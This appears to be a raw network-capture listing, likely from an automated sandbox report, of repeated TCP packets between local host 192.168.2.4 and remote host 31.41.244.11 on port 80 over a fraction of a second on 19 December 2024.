                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.504461050 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.504501104 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.505428076 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.505470991 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.505543947 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.505580902 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.506504059 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.506546974 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.506633043 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.506671906 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.507613897 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.507668018 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.507695913 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.507735968 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.508671045 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.508714914 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.508780956 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.508821011 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.509813070 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.509856939 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.509963036 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.510003090 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.510926008 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.510966063 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.511035919 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.511076927 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.512008905 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.512058973 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.512075901 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.512121916 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.513056993 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.513111115 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.513164043 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.513206005 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.514211893 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.514225006 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.514252901 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.514276981 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.515214920 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.515252113 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.515350103 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.515391111 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.516459942 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.516472101 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.516499996 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.516513109 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.517443895 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.517483950 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.517518044 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.517560005 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.518520117 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.518582106 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.518660069 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.519675970 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.519686937 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.519728899 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.519738913 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.520709038 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.520749092 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.520781040 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.520817041 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.521755934 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.521800995 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.521848917 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.521891117 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.522880077 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.522918940 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.523353100 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.523406029 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.523932934 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.523973942 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.524302959 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.524347067 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.525049925 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.525099993 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.525127888 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.525166988 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.526132107 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.526170969 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.526200056 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.526247025 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.527368069 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.527379990 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.527415991 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.527499914 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.528301954 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.528342962 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.528424978 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.528462887 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.529376984 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.529417038 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.529567003 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.529604912 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.530509949 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.530561924 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.530579090 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.530622005 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.531594038 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.531641960 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.531671047 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.531709909 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.532660961 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.532707930 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.532758951 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.532799006 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.533757925 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.533812046 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.533946991 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.533984900 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.534835100 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.534878969 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.535011053 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.535048962 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.535958052 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.535995007 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.536020994 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.536062956 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.537153959 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.537223101 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.537280083 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.537324905 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.538105965 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.538144112 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.538213015 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.538253069 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.539205074 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.539256096 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.539284945 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.539334059 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.540262938 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.540311098 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.540445089 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.540483952 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.541953087 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.541964054 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.542009115 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.542027950 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.543029070 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.543040991 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.543082952 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.543570042 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.543612957 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.543654919 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.543697119 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.544883013 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.544893980 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.544931889 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.545710087 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.545749903 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.545938015 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.545985937 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.547012091 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.547023058 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.547055960 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.547070026 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.547875881 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.547928095 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.683279037 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.683341980 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.683363914 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.683403969 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.683753967 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.683792114 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.683967113 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.684000969 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.684798956 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.684844971 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.685038090 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.685076952 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.685939074 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.685981035 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.686011076 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.686054945 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.686997890 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.687042952 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.687239885 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.687279940 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.688123941 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.688168049 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.688193083 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.688245058 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.689203978 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.689248085 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.689276934 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.689320087 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.690301895 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.690350056 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.690397978 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.690442085 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.691354036 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.691392899 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.691720009 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.691761017 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.692455053 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.692497969 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.692609072 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.692652941 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.693568945 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.693629980 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.693659067 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.693697929 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.694658995 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.694705009 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.694746017 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.694785118 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.695967913 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.695979118 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.696010113 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.696018934 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.696779013 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.696824074 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.697057962 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.697092056 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.697887897 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.697926044 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.698019028 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.698059082 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.698976994 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.699028015 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.699104071 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.699146986 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.700059891 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.700103998 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.700193882 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.700237989 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.701158047 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.701204062 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.701360941 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.701406956 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.702244043 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.702286959 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.702456951 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.702500105 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.703345060 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.703387976 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.703461885 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.703507900 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.704483032 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.704521894 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.704725981 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.704770088 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.705549955 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.705593109 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.705698967 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.705741882 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.706633091 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.706676960 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.706732035 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.706773996 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.707720995 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.707766056 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.707881927 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.707926989 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.708821058 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.708865881 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.708889008 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.708925009 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.709882021 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.709925890 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.709983110 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.710028887 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.711033106 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.711081982 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.711153984 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.711198092 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.712157965 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.712168932 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.712203026 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.712225914 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.713201046 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.713243961 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.713247061 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.713289022 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.714279890 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.714353085 CET4983880192.168.2.431.41.244.11
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.714394093 CET804983831.41.244.11192.168.2.4
                                                                                                                                                                                                                                        Dec 19, 2024 06:09:42.714438915 CET4983880192.168.2.431.41.244.11
